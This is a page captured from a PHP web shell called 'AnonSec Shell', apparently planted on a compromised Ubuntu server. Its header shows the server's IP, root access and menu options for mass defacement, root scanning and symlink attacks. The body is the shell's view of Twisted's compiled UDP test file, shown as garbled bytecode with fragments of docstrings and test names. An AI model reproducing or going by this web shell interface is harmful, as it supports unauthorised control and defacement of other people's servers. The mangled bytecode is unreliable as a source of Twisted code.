AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/python3/dist-packages/twisted/internet/test/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /usr/lib/python3/dist-packages/twisted/internet/test/__pycache__/test_udp.cpython-310.pyc
o

�b�A�@sLdZddlZddlmZddlmZddlmZmZddl	m
Z
mZddlm
Z
mZddlmZmZmZmZdd	lmZdd
lmZmZddlmZddlmZdd
lmZmZddl m!Z!m"Z"ddl#m$Z$dd�Z%e%�Z&dd�Z'Gdd�de�Z(Gdd�d�Z)Gdd�dee)e(�Z*Gdd�dee)e(�Z+e,��-e*�.��e,��-e+�.��dS)zU
Tests for implementations of L{IReactorUDP} and the UDP parts of
L{IReactorSocket}.
�N)�implementer)�verifyObject)�defer�error)�IPv4Address�IPv6Address)�Deferred�
maybeDeferred)�IListeningPort�ILoggingContext�IReactorSocket�IReactorUDP)�DatagramProtocol)�LogObserverMixin�findFreePort)�ReactorBuilder)�context)�ILogContext�err)�
GoodClient�Server)�SkipTestcCsJd}d}zt�tj�}|�d�d}Wn	tyYnw|r#|��|S)z4Returns True if the system can bind an IPv6 address.NF)�::1rT)�socket�AF_INET6�bind�OSError�close)�sock�has_ipv6�r �@/usr/lib/python3/dist-packages/twisted/internet/test/test_udp.py�	_has_ipv6!s
�r"cCstsd|_|S)Nz.Does not work on systems without IPv6 support.)�HAS_IPV6�skip)�fr r r!�skipWithoutIPv65sr&c@s(eZdZdZdd�Zdd�Zdd�ZdS)	�DatagramTransportTestsMixinzP
    Mixin defining tests which apply to any port/datagram based transport.
    cCsd|��}|��}tt�Gdd�dt��}|�}|�||�}d|��jf}|�|f|dd�dS)zu
        When a port starts, a message including a description of the associated
        protocol is logged.
        c@seZdZdd�ZdS)zQDatagramTransportTestsMixin.test_startedListeningLogMessage.<locals>.SomeProtocolcSsdS)NzCrazy Protocolr ��selfr r r!�	logPrefixJsz[DatagramTransportTestsMixin.test_startedListeningLogMessage.<locals>.SomeProtocol.logPrefixN)�__name__�
__module__�__qualname__r*r r r r!�SomeProtocolHsr.zCrazy Protocol starting on %dr�messageN)	�observe�buildReactorrrr�getListeningPort�getHost�port�assertEqual)r)�loggedMessages�reactorr.�protocol�p�expectedMessager r r!�test_startedListeningLogMessage@sz;DatagramTransportTestsMixin.test_startedListeningLogMessagecsz|���|���|��t���d���j�d�}�fdd�����fdd�}��|�|���|�|f�dd�d	S)
z�
        When a connection is lost a message is logged containing an
        address identifying the port and the fact that it was closed.
        z
(UDP Port z Closed)cs���dS�N��stop��ignored�r7r r!�stopReactor]�zNDatagramTransportTestsMixin.test_connectionLostLogMessage.<locals>.stopReactorcs�dd�=t�j����dSr<)r	�
stopListening�addCallbackr )r6r9rBr r!�doStopListening`s
zRDatagramTransportTestsMixin.test_connectionLostLogMessage.<locals>.doStopListeningrr/N)	r0r1r2rr3r4�callWhenRunning�
runReactorr5)r)r:rFr )r6r9r7rBr!�test_connectionLostLogMessageSs

z9DatagramTransportTestsMixin.test_connectionLostLogMessagecs`G�fdd�dt�}|���|�}|��|�|���|�|j�|�|j�|�|j�dS)z�
        L{DatagramProtocol.stopProtocol} is called asynchronously (ie, not
        re-entrantly) when C{stopListening} is used to stop the datagram
        transport.
        cs0eZdZdZdZdZdZdd�Z�fdd�ZdS)zVDatagramTransportTestsMixin.test_stopProtocolScheduling.<locals>.DisconnectingProtocolFcSs d|_d|_|j��d|_dS)NTF)�started�inStartProtocol�	transportrDr(r r r!�
startProtocolws

zdDatagramTransportTestsMixin.test_stopProtocolScheduling.<locals>.DisconnectingProtocol.startProtocolcsd|_|j|_���dS)NT)�stoppedrK�stoppedInStartr>r(rAr r!�stopProtocol}szcDatagramTransportTestsMixin.test_stopProtocolScheduling.<locals>.DisconnectingProtocol.stopProtocolN)	r+r,r-rJrNrKrOrMrPr rAr r!�DisconnectingProtocolpsrQN)	rr1r2rH�
assertTruerJrN�assertFalserO)r)rQr8r rAr!�test_stopProtocolSchedulingis
z7DatagramTransportTestsMixin.test_stopProtocolSchedulingN)r+r,r-�__doc__r;rIrTr r r r!r';s
r'c@s�eZdZdZdd�Zdd�Zedd��Zdd	�Zd
d�Z	dd
�Z
dd�Zdd�Zedd��Z
edd��Zdd�Zedd��Zedd��Zdd�Zdd�Zd S)!�UDPPortTestsMixinzY
    Tests for L{IReactorUDP.listenUDP} and
    L{IReactorSocket.adoptDatagramPort}.
    cCs*|��}|�|t��}|�tt|��dS)zY
        L{IReactorUDP.listenUDP} returns an object providing L{IListeningPort}.
        N)r1r2rrRrr
�r)r7r4r r r!�test_interface�sz UDPPortTestsMixin.test_interfacecCsHttjd�\}}|��}|j|t�||d�}|�|��td||��dS)z�
        L{IListeningPort.getHost} returns an L{IPv4Address} giving a
        dotted-quad of the IPv4 address the port is listening on as well as
        the port number.
        )�type)r4�	interface�UDPN)	rr�
SOCK_DGRAMr1r2rr5r3r)r)�host�
portNumberr7r4r r r!�test_getHost�s
�zUDPPortTestsMixin.test_getHostcCs@|��}|j|t�dd�}|��}|�|jd�|�|t�dS)zr
        L{IListeningPort.getHost} returns an L{IPv6Address} when listening on
        an IPv6 interface.
        r�rZN)r1r2rr3r5r]�assertIsInstancer)r)r7r4�addrr r r!�test_getHostIPv6�s
z"UDPPortTestsMixin.test_getHostIPv6cCs&|��}|jtj|jt�ddd�dS)z�
        An L{InvalidAddressError} is raised when trying to listen on an address
        that isn't a valid IPv4 or IPv6 address.
        rzexample.comr`N)r1�assertRaisesr�InvalidAddressError�	listenUDPr)r)r7r r r!�test_invalidInterface�s
�z'UDPPortTestsMixin.test_invalidInterfacecs�Gdd�dt�}����|d�}|j}���|�}|��}�fdd�}|�|�|�t�|��fdd��|�dd	|j	f���
��d
S)z�
        Datagram transports implement L{ILoggingContext.logPrefix} to return a
        message reflecting the protocol they are running.
        c@s$eZdZdd�Zdd�Zdd�ZdS)zIUDPPortTestsMixin.test_logPrefix.<locals>.CustomLogPrefixDatagramProtocolcSs||_t�|_dSr<)�_prefixr�system)r)�prefixr r r!�__init__�szRUDPPortTestsMixin.test_logPrefix.<locals>.CustomLogPrefixDatagramProtocol.__init__cSs|jSr<)rhr(r r r!r*�szSUDPPortTestsMixin.test_logPrefix.<locals>.CustomLogPrefixDatagramProtocol.logPrefixcSs2|jdur|j}d|_|�t�t�d�dSdS)Nri)ri�callbackr�getr)r)�bytesrbrir r r!�datagramReceived�s

�zZUDPPortTestsMixin.test_logPrefix.<locals>.CustomLogPrefixDatagramProtocol.datagramReceivedN)r+r,r-rkr*ror r r r!�CustomLogPrefixDatagramProtocol�srpzCustom Datagramscs��d|�dS)NzCustom Datagrams (UDP))r5)rir(r r!�	gotSystem��z3UDPPortTestsMixin.test_logPrefix.<locals>.gotSystemc����Sr<r=r?rAr r!�<lambda>��z2UDPPortTestsMixin.test_logPrefix.<locals>.<lambda>s
some bytes�	127.0.0.1N)rr1rir2r3rE�
addErrbackr�writer4rH)r)rpr8�dr4�addressrqr )r7r)r!�test_logPrefix�s

z UDPPortTestsMixin.test_logPrefixcs�Gdd�dt�}����|�}|j}���|�}|��}d���fdd�}|�|�|�t�|��fdd��|��d|j	f���
��d	S)
zH
        Write a sequence of L{bytes} to a L{DatagramProtocol}.
        c@seZdZdd�Zdd�ZdS)zDUDPPortTestsMixin.test_writeSequence.<locals>.SimpleDatagramProtocolcSst�|_dSr<)rrr(r r r!rk�rCzMUDPPortTestsMixin.test_writeSequence.<locals>.SimpleDatagramProtocol.__init__cSs|j�|�dSr<)rrl)r)�datarbr r r!ro�rrzUUDPPortTestsMixin.test_writeSequence.<locals>.SimpleDatagramProtocol.datagramReceivedN)r+r,r-rkror r r r!�SimpleDatagramProtocol�sr})ssomesbytesstoswritecs��d���|�dS)N�)r5�join)r|)�dataToWriter)r r!�gotData�sz5UDPPortTestsMixin.test_writeSequence.<locals>.gotDatacrsr<r=r?rAr r!rt�ruz6UDPPortTestsMixin.test_writeSequence.<locals>.<lambda>rvN)rr1rr2r3rErwr�
writeSequencer4rH)r)r}r8rr4rzr�r )r�r7r)r!�test_writeSequence�s

z$UDPPortTestsMixin.test_writeSequencecCs4|��}|�|t��}|�t|��j�t|��dS)zQ
        C{str()} on the listening port object includes the port number.
        N)r1r2r�assertIn�strr3r4rWr r r!�test_str�zUDPPortTestsMixin.test_strcCs4|��}|�|t��}|�t|��j�t|��dS)zR
        C{repr()} on the listening port object includes the port number.
        N)r1r2rr��reprr3r4r�rWr r r!�	test_repr	r�zUDPPortTestsMixin.test_reprc��|���t��t��}�_|j��dd�t��t��}�_|j��dd��j��}��fdd�}�fdd�}t�	||g�}|�
|�|�
|�|�t�|�
���jd}|�|d|j|jff�d	S)
zS
        Writing to an IPv6 UDP socket on the loopback interface succeeds.
        rr`cs,�j�dd�j��jf�t��}�_|S)��
            Send a datagram from the client once it's started.

            @param ignored: a list of C{[None, None]}, which is ignored
            @returns: a deferred which fires when the server has received a
                datagram.
            �spamr)rLrxr3r4rr�packetReceived�r@�serverReceived��client�serverr r!�cbClientStarted szDUDPPortTestsMixin.test_writeToIPv6Interface.<locals>.cbClientStartedc����dS�z�
            Stop the reactor after a datagram is received.

            @param ignored: L{None}, which is ignored
            @returns: L{None}
            Nr=r?rAr r!�cbServerReceived,szEUDPPortTestsMixin.test_writeToIPv6Interface.<locals>.cbServerReceivedrr�N�r1rrr�startedDeferredr2rrLr3�
gatherResultsrErwrrH�packetsr5r]r4�r)�
serverStarted�
clientStarted�cAddrr�r�ry�packetr �r�r7r�r!�test_writeToIPv6Interfaces"
	




z+UDPPortTestsMixin.test_writeToIPv6Interfacecr�)
z�
        An IPv6 address can be passed as the C{interface} argument to
        L{listenUDP}. The resulting Port accepts IPv6 datagrams.
        rr`cs4�j�d�j��j��j�d�t��}�_|S)r�rr�)rL�connectr3r4rxrrr�r�r�r r!r�Ns	zMUDPPortTestsMixin.test_connectedWriteToIPv6Interface.<locals>.cbClientStartedcr�r�r=r?rAr r!r�\szNUDPPortTestsMixin.test_connectedWriteToIPv6Interface.<locals>.cbServerReceivedrr�Nr�r�r r�r!�"test_connectedWriteToIPv6Interface>s"






z4UDPPortTestsMixin.test_connectedWriteToIPv6InterfacecC�.|��}|�|t��}|�tj|jdd�dS)zn
        Writing to a hostname instead of an IP address will raise an
        L{InvalidAddressError}.
        �spam)�example.invalid�N�r1r2rrdrrerxrWr r r!�/test_writingToHostnameRaisesInvalidAddressErroros
�zAUDPPortTestsMixin.test_writingToHostnameRaisesInvalidAddressErrorcC�2|��}|j|t�dd�}|�tj|jdd�dS)�l
        Writing to an IPv6 address on an IPv4 socket will raise an
        L{InvalidAddressError}.
        rvr`r�)rr�Nr�rWr r r!�1test_writingToIPv6OnIPv4RaisesInvalidAddressErrorzszCUDPPortTestsMixin.test_writingToIPv6OnIPv4RaisesInvalidAddressErrorcCr�)r�rr`r�)rvr�Nr�rWr r r!�1test_writingToIPv4OnIPv6RaisesInvalidAddressError�s
�zCUDPPortTestsMixin.test_writingToIPv4OnIPv6RaisesInvalidAddressErrorcCr�)zq
        Connecting to a hostname instead of an IP address will raise an
        L{InvalidAddressError}.
        r�r�N)r1r2rrdrrer�rWr r r!�2test_connectingToHostnameRaisesInvalidAddressError�szDUDPPortTestsMixin.test_connectingToHostnameRaisesInvalidAddressErrorcCs2|��}|�|t��}|�d�|�|���dS)zk
        L{IListeningPort.setBroadcastAllowed} sets broadcast to be allowed
        on the socket.
        TN)r1r2r�setBroadcastAllowedrR�getBroadcastAllowedrWr r r!�test_allowBroadcast�s
z%UDPPortTestsMixin.test_allowBroadcastN)r+r,r-rUrXr_r&rcrgr{r�r�r�r�r�r�r�r�r�r�r r r r!rV�s,
$
,
0
	
	rVc@�"eZdZdZefZ	ddd�ZdS)	�UDPServerTestsBuilderzM
    Run L{UDPPortTestsMixin} tests using newly created UDP
    sockets.
    r�� cCs|j||||d�S)aB
        Get a UDP port from a reactor.

        @param reactor: A reactor used to build the returned
            L{IListeningPort} provider.
        @type reactor: L{twisted.internet.interfaces.IReactorUDP}

        @see: L{twisted.internet.IReactorUDP.listenUDP} for other
            argument and return types.
        )rZ�
maxPacketSize)rf)r)r7r8r4rZr�r r r!r2�s
�z&UDPServerTestsBuilder.getListeningPortN�rr�r�)r+r,r-rUr
�requiredInterfacesr2r r r r!r��s
�r�c@r�)	�UDPFDServerTestsBuilderzC
    Run L{UDPPortTestsMixin} tests using adopted UDP sockets.
    rr�r�c	Cs�t�|�rMd|vrtj}t�||�dd}ntj}||f}t�|tj�}|�|�|�d�z|�	|�
�|j||�W|�
�|��S|�
�|��wt
d��)a�
        Get a UDP port from a reactor, wrapping an already-initialized file
        descriptor.

        @param reactor: A reactor used to build the returned
            L{IListeningPort} provider.
        @type reactor: L{twisted.internet.interfaces.IReactorSocket}

        @param port: A port number to which the adopted socket will be
            bound.
        @type port: C{int}

        @param interface: The local IPv4 or IPv6 address to which the
            adopted socket will be bound.  defaults to '', ie all IPv4
            addresses.
        @type interface: C{str}

        @see: L{twisted.internet.IReactorSocket.adoptDatagramPort} for other
            argument and return types.
        �:r�Fz'Reactor does not provide IReactorSocket)r�
providedByrr�getaddrinfo�AF_INETr\r�setblocking�adoptDatagramPort�fileno�familyrr)	r)r7r8r4rZr��domainrz�portSockr r r!r2�s$


�
�
z(UDPFDServerTestsBuilder.getListeningPortNr�)r+r,r-rUrr�r2r r r r!r��s
�r�)/rUr�zope.interfacer�zope.interface.verifyr�twisted.internetrr�twisted.internet.addressrr�twisted.internet.deferrr	�twisted.internet.interfacesr
rrr
�twisted.internet.protocolr�&twisted.internet.test.connectionmixinsrr�#twisted.internet.test.reactormixinsr�twisted.pythonr�twisted.python.logrr�twisted.test.test_udprr�twisted.trial.unittestrr"r#r&r'rVr�r��globals�update�makeTestCaseClassesr r r r!�<module>s<Q
�
�9

Anon7 - 2022
AnonSec Team